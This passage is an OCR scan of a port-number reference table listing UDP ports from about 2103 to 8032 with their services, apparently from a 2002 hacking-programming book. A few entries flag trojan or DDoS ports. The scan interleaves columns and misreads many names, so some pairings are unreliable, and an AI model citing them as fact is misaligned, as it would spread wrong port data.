2235 


Sercomm-WLink 


UDP 


2103 


Zephyr serv-hm connection 


UDP 


2236 


Nani 


UDP 


2104 


Zephyr hostmanager 


UDP 


2237 


Optech Porti License Mam 


UDP 


2105 


MiniPay 


UDP 


2238 


AVIVA SNA SERVER 


UDP 


2106 


MZAP 


UDP 


2239 


Image Query 


UDP 


2107 


BinTec Admin 


UDP 


2240 


RECIPe 


UDP 


2108 


Comcam 


UDP 


2241 


IVS Daemon 


UDP 


2109 


Ergolight 


UDP 


2242 


Folio Remote Server 


UDP 


2110 


UMSP 


UDP 


2243 


Magicom Protocol 


UDP 


2111 


DSATP 


UDP 


2244 


NMS Server 


UDP 


2112 


Idonix MetaNet 


UDP 


2245 


HaO 


UDP 


2113 


HSL StoRM 


UDP 


2279 


xmquery 


UDP 


2114 


NEWHEIGHTS 


UDP 


2280 


LNVPOLLER 


UDP 


2115 


KDM 


UDP 


2281 


LNVCONSOLE 


UDP 


2116 


CCOWCMR 


UDP 


2282 


LNVALARM 


UDP 


2117 


MENTACLIENT 


UDP 


2283 


LNVSTATUS 


UDP 


2118 


MENTASERVER 


UDP 


2284 


LNVMAPS 


UDP 


2119 


GSIGATEKEEPER 


UDP 


2285 


LNVMAILMON 


UDP 


2120 


Quick Eagle Networks CP 


UDP 


2286 


NAS—Met ering 


UDP 


2121 


SCIENTIA-SSDB 


UDP 


2287 


DNA 


UDP 


2122 


CauPC Remote Control 


UDP 


2288 


NETML 


UDP 


2123 


GTP-Control Piane (3GPP) 


UDP 


2294 


Konshus License Manager 


UDP 


2124 


ELATELINK 


(FLEX) 




UDP 


2125 


LOCKSTEP 


UDP 


2295 


Advant License Manager 


UDP 


2126 


PktCable-COPS 


UDP 


2296 


Theta License Manager 


UDP 


2127 


INDEX-PC-WB 


(Rainbow) 




UDP 


2128 


Net Steward Control 


UDP 


2297 


D2K DataMover 1 


UDP 


2129 


cs-live . com 


UDP 


2298 


D2K DataMover 2 


UDP 


2130 


SWC-XDS 


UDP 


2299 


PC Telecommute 


UDP 


2131 


Avantageb2b 


UDP 


2300 


CVMMON 


UDP 


2132 


AVAIL-EPMAP 


UDP 


2301 


Compaq HTTP 


UDP 


2133 


ZYMED-ZPP 


UDP 


2302 


Bindery Support 


UDP 


2134 


AVENUE 


UDP 


2303 


Proxy Gateway 


UDP 


2135 


Grid Resource Information 


UDP 


2304 


Attachmate UTS 


Server 




UDP 


2305 


MT ScaleServer 


UDP 


2136 


APPWORXSRV 


UDP 


2306 


TAPPI BoxNet 


UDP 


2137 


CONNECT 


UDP 


2307 


pehelp 


UDP 


2138 


UNBIND—CLUSTER 


UDP 


2308 


sdhelp 


UDP 


2139 


IAS-AUTH 


UDP 


2309 


SD Server 


UDP 


2140 


IAS-REG / Deep Throat 


UDP 


2310 


SD Client 


(Windows Trojan) / Deep Throat 2 


UDP 


2311 


Message Service 


(Windows Trojan) 


UDP 


2313 


IAPP (Inter Access Point 


UDP 


2141 


IAS—ADMIND 


Protocol) 




UDP 


2142 


TDM-OVER-IP 


UDP 


2314 


CR WebSystems 


UDP 


2143 


Live Vault Job Control 


UDP 


2315 


Precise Sft . 


UDP 


2144 


Live Vault Fast Object 


UDP 


2316 


SENT License Manager 


Transfer 




UDP 


2317 


Attachmate G32 


UDP 


2145 


Live Vault Remote Diagnostic 


UDP 


2318 


Cadence Control 


Console Support 


UDP 


2319 


InfoLibria 


UDP 


2146 


Live Vault Admin Event 


UDP 


2320 


Siebel NS 


Notification 


UDP 


2321 


RDLAP 


UDP 


2147 


Live Vault Authentication 


UDP 


2322 


ofsd 








UDP 


2323 


3d-nfsd 
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UDP 


2324 


Cosmocall 


UDP 


2411 


Netwave AP Management 


UDP 


2325 


Design Space License 


UDP 


2412 


CDN 


Management 




UDP 


2413 


ori on—rmi —reg 


UDP 


2326 


IDCP 


UDP 


2414 


Interlingua 


UDP 


2327 


xingcsm 


UDP 


2415 


COMTEST 


UDP 


2328 


Netrix SFTM 


UDP 


2416 


RMT Server 


UDP 


2329 


NVD 


UDP 


2417 


Composit Server 


UDP 


2330 


TSCCHAT 


UDP 


2418 


cas 


UDP 


2331 


AGENTVIEW 


UDP 


2419 


Attachmate S2S 


UDP 


2332 


RCC Host 


UDP 


2420 


DSL Remote Management 


UDP 


2333 


SNAPP 


UDP 


2421 


G-Talk 


UDP 


2334 


ACE Client Auth 


UDP 


2422 


CRMSBITS 


UDP 


2335 


ACE Proxy 


UDP 


2423 


RNRP 


UDP 


2336 


Apple UG Control 


UDP 


2424 


KOFAX-SVR 


UDP 


2337 


ideesrv 


UDP 


2425 


Fujitsu App Manager 


UDP 


2338 


Norton Lambert 


UDP 


2426 


Appliant UDP 


UDP 


2339 


3Com WebView 


UDP 


2427 


Media Gateway Control 



UDP 2340 WRS Registry 

UDP 2341 XIO Status 

UDP 2342 Seagate Manage Exec 

UDP 2343 nati logos 

UDP 2344 fcmsys 

UDP 2345 dbm 

UDP 2346 Game Connection Port 

UDP 2347 Game Announcement and 
Location 

UDP 2348 Information to query for 

game status 

UDP 2349 Disgnostics Port 

UDP 2350 psbserver 

UDP 2351 psrserver 

UDP 2352 pslserver 

UDP 2353 pspserver 

UDP 2354 psprserver 

UDP 2355 psdbserver 

UDP 2356 GXT License Managemant 

UDP 2357 UniHub Server 

UDP 2358 Futrix 

UDP 2359 FlukeServer 

UDP 2360 NexstorlndLtd 

UDP 2361 TL1 

UDP 2362 digiman 

UDP 2363 Media Central NFSD 

UDP 2364 01-200 0 

UDP 2365 dbref 

UDP 2366 qip-login 

UDP 2367 Service Control 

UDP 2368 OpenTable 

UDP 2369 ACS2000 DSP 

UDP 2370 L3—HBMon 

UDP 2381 Compaq HTTPS 

UDP 2382 Microsoft OLAP 

UDP 2383 Microsoft OLAP 

UDP 2384 SD-REQUEST 

UDP 2389 OpenView Session Mgr 

UDP 2390 RSMTP 

UDP 2391 3C0M Net Management 

UDP 2392 Tactical Auth 

UDP 2393 MS OLAP 1 

UDP 2394 MA OLAP 2 

UDP 2395 LAN900 Remote 

UDP 2396 Wusage 

UDP 2397 NCL 

UDP 2398 Orbiter 

UDP 2399 FileMaker Inc. - Data Access 
Layer 



Protocol Gateway 

UDP 2428 One Way Trip Time 

UDP 2429 FT-ROLE 

UDP 2430 venus 

UDP 2431 venus-se 

UDP 2432 codasrv 

UDP 2433 codasrv-se 

UDP 2434 pxc-epmap 

UDP 2435 OptiLogic 

UDP 2436 TOP/X 

UDP 2437 UniControl 

UDP 2438 MSP 

UDP 2439 SybaseDBSynch 

UDP 2440 Spearway Lockser 

UDP 2441 pvsw-inet 

UDP 2442 Netangel 

UDP 2443 PowerClient Central Storage 
Facility 

UDP 2444 BT PP2 Sectrans 

UDP 2445 DTN1 

UDP 2446 buesservice 

UDP 2447 OpenView NNM daemon 

UDP 2448 hpppsvr 

UDP 2449 RATL 

UDP 2450 netadmin 

UDP 2451 netchat 

UDP 2452 SnifferClient 

UDP 2453 madge-om 

UDP 2454 IndX-DDS 

UDP 2455 WAGO— IO— SYSTEM 

UDP 2456 altav-remmgt 

UDP 2457 Rapido_IP 

UDP 2458 griffin 

UDP 2459 Community 

UDP 2460 ms-theater 

UDP 2461 qadmifoper 

UDP 2462 qadmifevent 

UDP 2463 Symbios Raid 

UDP 24 64 DirecPC SI 

UDP 2465 Load Balance Management 

UDP 2466 Load Balance Forwarding 

UDP 2467 High Criteria 

UDP 2468 qip_msgd 

UDP 2469 MTI-TCS-COMM 

UDP 2470 taskman port 

UDP 2471 SeaODBC 

UDP 24 72 C3 

UDP 2473 Aker-cdp 

UDP 24 74 Vital Analysis 



UDP 


2400 


OpEquus Server 




UDP 2475 ACE Server 


UDP 


2401 


cvspserver 




UDP 2476 ACE Server Propagation 


UDP 


2402 


TaskMaster 2000 


Server 


UDP 2477 SecurSight Certificate 


UDP 


2403 


TaskMaster 2000 


Web 


Valifation Service 


UDP 


2404 


IEC87 0-5-104 




UDP 2478 SecurSight Authentication 


UDP 


2405 


TRC Netpoll 




Server (SSL) 


UDP 


2406 


JediServer 




UDP 2479 SecurSight Event Logging 


UDP 


2407 


Orion 




Server (SSL) 


UDP 


2408 


OptimaNet 




UDP 2480 Lingwood's Detail 


UDP 


2409 


SNS Protocol 




UDP 2481 Oracle GIOP 


UDP 


2410 


VRTS Registry 




UDP 2482 Oracle GIOP SSL 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



UDP 


2483 


Oracel TTC 


UDP 


2557 


nicetec-mgmt 


UDP 


2484 


Oracle TTC SSL 


UDP 


2558 


PCLE Multi Media 


UDP 


2485 


Net Objectsl 


UDP 


2559 


LSTP 


UDP 


2486 


Net Objects2 


UDP 


2560 


labrat 


UDP 


2487 


Policy Notice Service 


UDP 


2561 


MosaixCC 


UDP 


2488 


Moy Corporation 


UDP 


2562 


Delibo 


UDP 


2489 


TSILB 


UDP 


2563 


CTI Redwood 


UDP 


2490 


qip__qdhcp 


UDP 


2565 


Coordinator Server 


UDP 


2491 


Conclave CPP 


UDP 


2566 


pcs-pcw 


UDP 


2492 


GROOVE 


UDP 


2567 


Cisco Line Protocol 


UDP 


2493 


Talarian MQS 


UDP 


2568 


SPAM TRAP 


UDP 


2494 


BMC AR 


UDP 


2569 


Sonus Cali Signal 


UDP 


2495 


Fast Remote Services 


UDP 


2570 


HS Port 


UDP 


2496 


DIRGIS 


UDP 


2571 


CECSVC 


UDP 


2497 


Quad DB 


UDP 


2572 


IBP 


UDP 


2498 


ODN-CasTraq 


UDP 


2573 


Trust Establish 


UDP 


2499 


UniControl 


UDP 


2574 


Blockade BPSP 


UDP 


2500 


Resource Tracking system 


UDP 


2575 


HL7 


server 




UDP 


2576 


TCL Pro Debugger 


UDP 


2501 


Resource Tracking system 


UDP 


2577 


Scriptics Lsrvr 


client 




UDP 


2578 


RVS ISDN DCP 


UDP 


2502 


Kentrox Protocol 


UDP 


2579 


mpfoncl 


UDP 


2503 


NMS-DPNSS 


UDP 


2580 


Tributary 


UDP 


2504 


WLBS 


UDP 


2581 


ARGIS TE 


UDP 


2505 


torque-traffic 


UDP 


2582 


ARGIS DS 


UDP 


2506 


jbroker 


UDP 


2583 


MON 


UDP 


2507 


spock 


UDP 


2584 


cyaserv 


UDP 


2508 


JDataStore 


UDP 


2585 


NETX Server 


UDP 


2509 


fjmpss 


UDP 


2586 


NETX Agent 


UDP 


2510 


fjappmgrbulk 


UDP 


2587 


MASC 


UDP 


2511 


Metastorm 


UDP 


2588 


Privilege 


UDP 


2512 


Citrix IMA 


UDP 


2589 


quartus tei 


UDP 


2513 


Citrix ADMIN 


UDP 


2590 


idotdist 


UDP 


2514 


Facsys NTP 


UDP 


2591 


Maytag Shuffle 


UDP 


2515 


Facsys Router 


UDP 


2592 


netrek 


UDP 


2516 


Main Control 


UDP 


2593 


MNS Mail Notice Service 


UDP 


2517 


H. 323 Annex E cali signaling 


UDP 


2594 


Data Base Server 


transport 




UDP 


2595 


World Fusion 1 


UDP 


2518 


Willy 


UDP 


2596 


World Fusion 2 


UDP 


2519 


globmsgsvc 


UDP 


2597 


Homestead Glory 


UDP 


2520 


pvsw 


UDP 


2598 


Citrix MA Client 


UDP 


2521 


Adaptec Manager 


UDP 


2599 


Meridian Data 


UDP 


2522 


WinDb 


UDP 


2600 


HPSTGMGR 


UDP 


2523 


Qke LLC V.3 


UDP 


2601 


discp client 


UDP 


2524 


Optiwave License Management 


UDP 


2602 


discp server 


UDP 


2525 


MS V-Worlds 


UDP 


2603 


Service Meter 


UDP 


2526 


EMA License Manager 


UDP 


2604 


NSC CCS 


UDP 


2527 


IQ Server 


UDP 


2605 


NSC POSA 


UDP 


2528 


NCR CCL 


UDP 


2606 


Dell Netmon 


UDP 


2529 


UTS FTP 


UDP 


2607 


Dell Connection 


UDP 


2530 


VR Commerce 


UDP 


2608 


Wag Service 


UDP 


2531 


ITO-E GUI 


UDP 


2609 


System Monitor 


UDP 


2532 


OVTOPMD 


UDP 


2610 


VersaTek 


UDP 


2533 


SnifferServer 


UDP 


2611 


LIONHEAD 


UDP 


2534 


Combox Web Access 


UDP 


2612 


Qpasa Agent 


UDP 


2535 


MADCAP 


UDP 


2613 


SMNTUBootstrap 


UDP 


2536 


btpp2audctrl 


UDP 


2614 


Never Offline 


UDP 


2537 


Upgrade Protocol 


UDP 


2615 


firepower 


UDP 


2538 


vnwk-prapi 


UDP 


2616 


appswi t ch—emp 


UDP 


2539 


VSI Admin 


UDP 


2617 


Clinical Context Managers 


UDP 


2540 


LonWorks 


UDP 


2618 


Priority E— Com 


UDP 


2541 


LonWorks2 


UDP 


2619 


bruce 


UDP 


2542 


daVinci 


UDP 


2620 


LPSRecommender 


UDP 


2543 


REFTEK 


UDP 


2621 


Miles Apart Jukebox Server 


UDP 


2544 


Novell ZEN novell . com 


UDP 


2622 


MetricaDBC 


UDP 


2545 


sis—emt 


UDP 


2623 


LMDP 


UDP 


2546 


vytalvaultbrtp 


UDP 


2624 


Aria 


UDP 


2547 


vytalvaultvsmp 


UDP 


2625 


Blwnkl Port 


UDP 


2548 


vytalvaultpipe 


UDP 


2626 


gbjd81 6 


UDP 


2549 


IPASS 


UDP 


2627 


Moshe Beeri 


UDP 


2550 


ADS 


UDP 


2628 


DICT 


UDP 


2551 


ISG UDA Server 


UDP 


2629 


Sitara Server 


UDP 


2552 


Cali Logging 


UDP 


2630 


Sitara Management 


UDP 


2553 


efidiningport 


UDP 


2631 


Sitara Dir 


UDP 


2554 


VCnet-Link vlO 


UDP 


2632 


IRdg Post 


UDP 


2555 


Compaq WCP 


UDP 


2633 


Inter Intelli 


UDP 


2556 


nicetec—nmsvc 


UDP 


2634 


PK Electronics 
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UDP 


2635 


Back Burner 


UDP 


2711 


SSO Control 


UDP 


2636 


Solve 


UDP 


2712 


Axapta Object Communication 


UDP 


2637 


Import Document Service 


Protocol 




UDP 


2638 


Sybase Anywhere 


UDP 


2713 


Ravenl 


UDP 


2639 


AMInet 


UDP 


2714 


unified—technologies . com 


UDP 


2640 


Sabbagh Associates Licence 


UDP 


2715 


HPSTGMGR2 


Manager 




UDP 


2716 


Inova IP Disco 


UDP 


2641 


HDL Server 


UDP 


2717 


PN REQUESTER 


UDP 


2642 


Tragic 


UDP 


2718 


PN REQUESTER 2 


UDP 


2643 


GTE-SAMP 


UDP 


2719 


Scan & Change 


UDP 


2644 


Travsoft IPX Tunnel 


UDP 


2720 


wkars 


UDP 


2645 


Novell IPX CMD 


UDP 


2721 


Smart Diagnose 


UDP 


2646 


AND License Manager 


UDP 


2722 


Proactive Server 


UDP 


2647 


SyncServer 


UDP 


2723 


WatchDog NT 


UDP 


2648 


Upsnotifyprot 


UDP 


2724 


qotps 


UDP 


2649 


VPSIPPORT 


UDP 


2725 


MSOLAP PTP2 


UDP 


2650 


eristwoguns 


UDP 


2726 


TAMS 


UDP 


2651 


EBInSite 


UDP 


2727 


Media Gateway Control 


UDP 


2652 


InterPathPanel 


Protocol Cali Agent 


UDP 


2653 


Sonus 


UDP 


2728 


SQDR 


UDP 


2654 


Corel VNC Admin 


UDP 


2729 


TCIM Control 


UDP 


2655 


UNIX Nt Glue 


UDP 


2730 


NEC RaidPlus 


UDP 


2656 


Kana 


UDP 


2731 


NetDragon Messanger 


UDP 


2657 


SNS Dispatcher 


UDP 


2732 


G5M 


UDP 


2658 


SNS Admin 


UDP 


2733 


Signet CTF 


UDP 


2659 


SNS Query 


UDP 


2734 


CCS Software 


UDP 


2660 


GC Monitor 


UDP 


2735 


Monitor Console 


UDP 


2661 


OLHOST 


UDP 


2736 


RADWIZ NMS SRV 


UDP 


2662 


BinTec-CAPI 


UDP 


2737 


SRP Feedback 


UDP 


2663 


BinTec-TAPI 


UDP 


2738 


NDL TCP-OSI Gateway 


UDP 


2664 


Command MQ GM 


UDP 


2739 


TN Timing 


UDP 


2665 


Command MQ PM 


UDP 


2740 


Alarm 


UDP 


2666 


extensis 


UDP 


2741 


TSB 


UDP 


2667 


Alarm Clock Server 


UDP 


2742 


TSB2 


UDP 


2668 


Alarm Clock Client 


UDP 


2743 


murx 


UDP 


2669 


TOAD 


UDP 


2744 


honyaku 


UDP 


2670 


TVE Announce 


UDP 


2745 


URBISNET 


UDP 


2671 


newlixreg 


UDP 


2746 


CPUDPENCAP 


UDP 


2672 


nhserver 


UDP 


2747 


yk. fujitsu. co. jp 


UDP 


2673 


First Cali 42 


UDP 


2748 


yk. fujitsu. co. jp 


UDP 


2674 


ewnn 


UDP 


2749 


yk. fujitsu. co. jp 


UDP 


2675 


TTC ETAP 


UDP 


2750 


yk. fujitsu. co. jp 


UDP 


2676 


SIMSLink 


UDP 


2751 


yk. fujitsu. co. jp 


UDP 


2677 


Gadget Gate 1 Way 


UDP 


2752 


RSISYS ACCESS 


UDP 


2678 


Gadget Gate 2 Way 


UDP 


2753 


de-spot 


UDP 


2679 


Sync Server SSL 


UDP 


2754 


APOLLO CC 


UDP 


2680 


pxc-sapxom 


UDP 


2755 


Express Pay 


UDP 


2681 


mpnjsomb 


UDP 


2756 


simplement—tie 


UDP 


2682 


SRSP 


UDP 


2757 


CNRP 


UDP 


2683 


NCDLoadBalance 


UDP 


2758 


APOLLO Status 


UDP 


2684 


mpnjsosv 


UDP 


2759 


APOLLO GMS 


UDP 


2685 


mpnjsocl 


UDP 


2760 


Saba MS 


UDP 


2686 


mpnjsomg 


UDP 


2761 


DICOM ISCL 


UDP 


2687 


pq—1 i c—mgmt 


UDP 


2762 


DICOM TLS 


UDP 


2688 


md-cf-HTTP 


UDP 


2763 


Desktop DNA 


UDP 


2689 


FastLynx 


UDP 


2764 


Data Insurance 


UDP 


2690 


HP NNM Embedded Database 


UDP 


2765 


qip—audup 


UDP 


2691 


IT Internet 


UDP 


2766 


Compaq SCP 


UDP 
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UDP 


4001 


NewOak 


UDP 


4802 


Icona License System Server 


UDP 


4002 


pxc—spvr—ft 


UDP 


4827 


HTCP 


UDP 


4003 


pxc-splr-ft 


UDP 


4837 


Varadero-0 


UDP 


4004 


pxc-roid 


UDP 


4838 


Varadero-1 


UDP 


4005 


pxc—pin 


UDP 


4839 


Varadero-2 


UDP 


4006 


pxc—spvr 


UDP 


4868 


Photon Relay 


UDP 


4007 


pxc-splr 


UDP 


4869 


Photon Relay Debug 


UDP 


4008 


NetCheque accounting 


UDP 


4885 


ABBS 


UDP 


4009 


Chimera HWM 


UDP 


4983 


AT&T Intercom 


UDP 


4010 


Samsung Unidex 


UDP 


5000 


filmaker . com 


UDP 


4011 


Alternate Service Boot 


UDP 


5001 


filmaker . com 


UDP 


4012 


PDA Gate 


UDP 


5002 


radio free ethernet 


UDP 


4013 


ACL Manager 


UDP 


5003 


FileMaker Inc. — Proprietary 


UDP 


4014 


TAICLOCK 


name 


binding 


UDP 


4015 


Talarian Mcast 


UDP 


5004 


avt— prof ile— 1 


UDP 


4016 


Talarian Mcast 


UDP 


5005 


avt—profile—2 


UDP 


4017 


Talarian Mcast 


UDP 


5006 


wsm server 


UDP 


4018 


Talarian Mcast 


UDP 


5007 


wsm server ssl 


UDP 


4019 


Talarian Mcast 


UDP 


5010 


TelepathStart 


UDP 


4045 


NFS lock daemon/manager 


UDP 


5011 


TelepathAttack 


UDP 


4096 


BRE (Bridge Relay Element) 


UDP 


5020 


zenginkyo—1 


UDP 


4097 


Patrol View 


UDP 


5021 


zenginkyo—2 


UDP 


4098 


drmsfsd 


UDP 


5042 


asnaaccelerSdb 


UDP 


4099 


DPCP 


UDP 


5050 


multimedia conference 


UDP 


4132 


NUTS Daemon 


control tool 


UDP 


4133 


NUTS Bootp Server 


UDP 


5051 


ITA Agent 


UDP 


4134 


NIFTY-Serve HMI protocol 


UDP 


5052 


ITA Manager 


UDP 


4141 


Workflow Server 


UDP 


5055 


UNOT 


UDP 


4142 


Document Server 


UDP 


5060 


SIP 


UDP 


4143 


Document Replication 


UDP 


5069 


I/Net 2000-NPR 


UDP 


4144 


Compuserve pc Windows 


UDP 


5071 


PowerSchool 


(unoffically) 


UDP 


5093 


Sentinel LM 


UDP 


4160 


Jini Discovery 


UDP 


5099 


SentLM Srv2Srv 


UDP 


4199 


EIMS ADMIN 


UDP 


5145 


RMONITOR SECURE 


UDP 


4299 


earth . patii . net 


UDP 


5150 


Ascend Tunnel Management 


UDP 


4300 


Corel CCam 


Protocol 




UDP 


4321 


Remote Who Is 


UDP 


5151 


ESRI SDE Remote Start 


UDP 


4343 


UNICALL 


UDP 


5152 


ESRI SDE Instance Discovery 


UDP 


4344 


Vinalnstall 


UDP 


5165 


ifelcorp 


UDP 


4345 


Macro 4 Network AS 


UDP 


5190 


Ameri ca—Onl ine 


UDP 


4346 


ELAN LM 


UDP 


5191 


AmericaOnlinel 
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UDP 


5192 


AmericaOnline2 


UDP 


5678 


Remote Replication Agent 


UDP 


5193 


AmericaOnline3 


Connection 




UDP 


5200 


Targus AIB 1 


UDP 


5679 


Direct Cable Connect Manac 


UDP 


5201 


Targus AIB 2 


UDP 


5713 


proshare conf audio 


UDP 


5202 


Targus TNTS 1 


UDP 


5714 


proshare conf video 


UDP 


5203 


Targus TNTS 2 


UDP 


5715 


proshare conf data 


UDP 


5236 


padl2sim 


UDP 


5716 


proshare conf request 


UDP 


5212 


PK 


UDP 


5717 


proshare conf notify 


UDP 


5300 


HA cluster heartbeat 


UDP 


5729 


Openmail User Agent Layer 


UDP 


5301 


HA cluster general services 


UDP 


5741 


IDA Discover Port 1 


UDP 


5302 


HA cluster configuration 


UDP 


5742 


IDA Discover Port 2 


UDP 


5303 


HA cluster probing 


UDP 


5745 


f copy-server 


UDP 


5304 


HA Cluster Commands hp.com 


UDP 


5746 


fcopys-server 


UDP 


5305 


HA Cluster Test hp.com 


UDP 


5755 


OpenMail Desk Gateway ser\ 


UDP 


5306 


Sun MC Group 


UDP 


5757 


OpenMail X. 500 Directory 


UDP 


5307 


SCO AIP 


Server 




UDP 


5308 


CFengine 


UDP 


5766 


OpenMail NewMail Server 


UDP 


5309 


J Printer 


UDP 


5767 


OpenMail Suer Agent Layer 


UDP 


5310 


Outlaws 


(Secure) 




UDP 


5311 


TM Login 


UDP 


5768 


OpenMail CMTS Server 


UDP 


5400 


Excerpt Search 


UDP 


5771 


NetAgent 


UDP 


5401 


Excerpt Search Secure 


UDP 


5813 


ICMPD 


UDP 


5402 


MFTP 


UDP 


5859 


WHEREHOO 


UDP 


5403 


HPOMS-CI-LSTN 


UDP 


5968 


mppol i cy—v5 


UDP 


5404 


HPOMS-DPS-LSTN 


UDP 


5969 


mppol i cy—mgr 


UDP 


5405 


NetSupport 


UDP 


5999 


CVSup 


UDP 


5406 


Systemics Sox 


UDP 


6063 


X Windows System mit . edu 


UDP 


5407 


Foresyte-Clear 


UDP 


6064 


NDL-AHP-SVC 


UDP 


5408 


Foresyte-Sec 


UDP 


6065 


WinPharaoh 


UDP 


5409 


Salient Data Server 


UDP 


6066 


EWCTSP 


UDP 


5410 


Salient User Manager 


UDP 


6067 


SRB 


UDP 


5411 


ActNet 


UDP 


6068 


GSMP 


UDP 


5412 


Continuus 


UDP 


6069 


TRIP 


UDP 


5413 


WWIOTALK 


UDP 


6070 


Messageasap 


UDP 


5414 


StatusD 


UDP 


6071 


SSDTP 


UDP 


5415 


NS Server 


UDP 


6072 


DIAGNOSE-PROC 


UDP 


5416 


SNS Gateway 


UDP 


6073 


DirectPlay8 


UDP 


5417 


SNS Agent 


UDP 


6100 


SynchroNet-db 


UDP 


5418 


MCNTP 


UDP 


6101 


SynchroNet-rtc 


UDP 


5419 


DJ-ICE 


UDP 


6102 


SynchroNet—upd 


UDP 


5420 


Cylink-C 


UDP 


6103 


RETS 


UDP 


5421 


Net Support 2 


UDP 


6104 


DBDB 


UDP 


5422 


Salient MUX 


UDP 


6105 


Prima Server 


UDP 


5423 


VIRTUALUSER 


UDP 


6106 


MPS Server 


UDP 


5426 


DEVBASIC 


UDP 


6107 


ETC Control 


UDP 


5427 


SCO-PEER-TTA 


UDP 


6108 


Sercomm-SCAdmin 


UDP 


5428 


TELACONSOLE 


UDP 


6109 


GLOBECAST-ID 


UDP 


5429 


Billing and Accounting 


UDP 


6110 


HP SoftBench CM 


System Exchange 


UDP 


6111 


HP SoftBench Sub-Process 


UDP 


5430 


RADEC CORP 


Control 




UDP 


5431 


PARK AGENT 


UDP 


6112 


dtspcd 


UDP 


5435 


Data Tunneling Transceiver 


UDP 


6123 


Backup Express 


Linking (DTTL) 


UDP 


6141 


Meta Corporation License 


UDP 


5454 


apc—t cp—udp-4 


Manager 




UDP 


5455 


apc—t cp—udp—5 


UDP 


6142 


Aspen Technology License 


UDP 


5456 


apc—tcp—udp—6 


Manager 




UDP 


5461 


SILKMETER 


UDP 


6143 


Watershed License Manager 


UDP 


5462 


TTL Publisher 


UDP 


6144 


StatSci License Manager - 


UDP 


5465 


NETOPS-BROKER 


UDP 


6145 


StatSci License Manager — 


UDP 


5500 


fcp—addr—srvrl 


UDP 


6146 


Lone Wolf Systems License 


UDP 


5501 


fcp—addr—srvr2 


Manager 




UDP 


5502 


fcp—srvr— insti 


UDP 


6147 


Montage License Manager 


UDP 


5503 


fcp—srvr—inst2 


UDP 


6148 


Ricardo North America 


UDP 


5504 


fcp—cics—gwl 


License Manager 


UDP 


5540 


ACE/ Server Services 


UDP 


6149 


tal-pod 


UDP 


5554 


SGI ESP HTTP 


UDP 


6253 


CRIP 


UDP 


5555 


Personal Agent 


UDP 


6321 


Empress Software 


UDP 


5599 


Enterprise Security Remote 


Connectivity Server 1 


Instali 




UDP 


6322 


Empress Software 


UDP 


5600 


Enterprise Security Manager 


Connectivity Server 2 


UDP 


5601 


Enterprise Security Agent 


UDP 


6389 


clariion—evrOl 


UDP 


5602 


Al-MSC 


UDP 


6400 


saegatesoftware . com 


UDP 


5603 


Al-BS 


UDP 


6401 


saegatesoftware . com 


UDP 


5604 


A3-SDUNode 


UDP 


6402 


saegatesoftware . com 


UDP 


5605 


A4-SDUNode 


UDP 


6403 


saegatesoftware . com 


UDP 


5631 


pcANYWHEREda t a 


UDP 


6404 


saegatesoftware . com 


UDP 


5632 


pcANYWHEREstat 


UDP 


6405 


saegatesoftware . com 
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UDP 


6406 


saegatesoftware. com 


UDP 


71 74 


Clutild 


UDP 


6407 


saegatesoftware . com 


UDP 


7200 


FODMS FLIP 


UDP 


6408 


saegatesoftware . com 


UDP 


7201 


DLIP 


UDP 


6409 


saegatesoftware . com 


UDP 


7390 


The Swiss Exchange swx.ch 


UDP 


6410 


saegatesoftware . com 


UDP 


7395 


winqedit 


UDP 


6455 


osmosys . incog. com 


UDP 


7426 


OpenView DM Postmaster 


UDP 


6456 


osmosys . incog. com 


Manager 




UDP 


6411 


LVision License Manager 


UDP 


7427 


OpenView DM Event Agent 


UDP 


6500 


BoKS Master 


Manager 




UDP 


6501 


BoKS Serve 


UDP 


7428 


OpenView DM Log Agent 


UDP 


6502 


BoKS Servm 


Manager 




UDP 


6503 


BoKS Clntd 


UDP 


7429 


OpenView DM rqt 


UDP 


6505 


BoKS Admin Private Port 


communication 


UDP 


6506 


BoKS Admin Public Port 


UDP 


7430 


OpenView DM xmpv7 api pipe 


UDP 


6507 


BoKS Dir Server Private Port 


UDP 


7431 


OpenView DM ovc/xmpv3 api 


UDP 


6508 


BoKS Dir Server Public Port 


pipe 






UDP 


6547 


apc-t cp-udp-1 


UDP 


7437 


Faximum 


UDP 


6548 


apc-t cp-udp-2 


UDP 


7491 


telops-lmd 


UDP 


6549 


apc-t cp-udp-3 


UDP 


7511 


pafec-lm 


UDP 


6550 


fg-sysupdate 


UDP 


7544 


FlowAnalyzer DisplayServer 


UDP 


6558 


xdsxdm 


UDP 


7545 


FlowAnalyzer UtilityServer 


UDP 


6669 


Internet Relay Chat 


UDP 


7566 


VSI Omega 


acrux. com 




UDP 


7570 


Aries Kfinder 


UDP 


6670 


Vocaltec Global Online 


UDP 


7588 


Sun License Manager 


Directory 




UDP 


7597 


TROJAN WORM 


UDP 


6672 


vision server 


UDP 


7633 


PMDF Management 


UDP 


6673 


vision elmd 


UDP 


7640 


CUSeeMe 


UDP 


6699 


Napster 


UDP 


7648 


CUCME live video/audio 


UDP 


6700 


Napster 


server 




UDP 


6701 


KTI/ICAD Nameserver 


UDP 


7649 


CUCME live video/audio 


UDP 


6702 


Carracho (client) 


server 




UDP 


6767 


BMC PERFORM AGENT 


UDP 


7650 


CUCME live video/audio 


UDP 


6768 


BMC PERFORM MGRD 


server 




UDP 


6790 


HNMP 


UDP 


7651 


CUCME live video/audio 


UDP 


6831 


ambit—lm 


server 




UDP 


6838 


DDOS communication UDP 


UDP 


7777 


cbt 


UDP 


6841 


Netmo Default 


UDP 


777S 


Interwise 


UDP 


6842 


Netmo HTTP 


UDP 


7781 


accu-lmgr 


UDP 


6850 


ICCRUSHMORE 


UDP 


7786 


MINIVEND 


UDP 


6888 


MUSE 


UDP 


7932 


Tier 2 Data Resource Manager 


UDP 


6961 


JMACT3 


UDP 


7933 


Tier 2 Business Rules 


UDP 


6962 


jmevt2 


Manager 




UDP 


6963 


swismgrl 


UDP 


7967 


Supercell 


UDP 


6964 


swismgr2 


UDP 


7979 


Mi cromu se—n cps 


UDP 


6965 


swistrap 


UDP 


7980 


Quest Vista 


UDP 


6966 


swispol 


UDP 


7983 


DDOS communication UDP 


UDP 


6969 


acmsoda 


UDP 


7999 


ÌRDMI2 


UDP 


6998 


IATP-highPri 


UDP 


8000 


iRDMI 


UDP 


6999 


IATP-normalPri 


UDP 


8001 


VCOM Tunnel 


UDP 


7000 


file server itself 


UDP 


8002 


Teradata ORDBMS 


UDP 


7001 


callbacks to cache managers 


UDP 


8008 


HTTP Alternate 


UDP 


7002 


users & groups database 


UDP 


8032 


ProEd 


UDP 


